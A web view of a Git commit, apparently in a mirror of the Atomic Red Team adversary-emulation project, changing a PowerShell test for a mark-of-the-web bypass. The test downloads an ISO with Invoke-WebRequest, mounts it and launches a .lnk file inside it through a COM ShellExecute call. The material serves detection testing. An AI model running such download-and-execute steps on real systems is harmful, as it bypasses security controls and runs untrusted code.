security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Merge pull request #2206 from redcanaryco/isofix

Browse Source 
Update T1553.005 - Runs lnk now
This commit is contained in:
Paul
2022-10-27 10:11:38 -07:00
committed by GitHub
parent e149cf9df2 93c92d10b2
commit 74a13a8b92
1 changed files with 2 additions and 1 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1553.005/T1553.005.yaml
+2 -1
View File
@@ -110,7 +110,8 @@ atomic_tests:
Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/AllTheThings.iso -OutFile "#{path_of_iso}"
executor:
command: |
$keep = Mount-DiskImage -ImagePath "#{path_of_iso}" -StorageType ISO -Access ReadOnly
Mount-DiskImage -ImagePath "#{path_of_iso}" -StorageType ISO -Access ReadOnly
$keep = Get-Volume -FileSystemLabel "AllTheThings"
$driveLetter = ($keep | Get-Volume).DriveLetter
$instance = [activator]::CreateInstance([type]::GetTypeFromCLSID("{c08afd90-f2a1-11d1-8455-00a0c91f3880}"))
$instance.Document.Application.ShellExecute($driveLetter+":\document.lnk","",$driveLetter+":\",$null,0)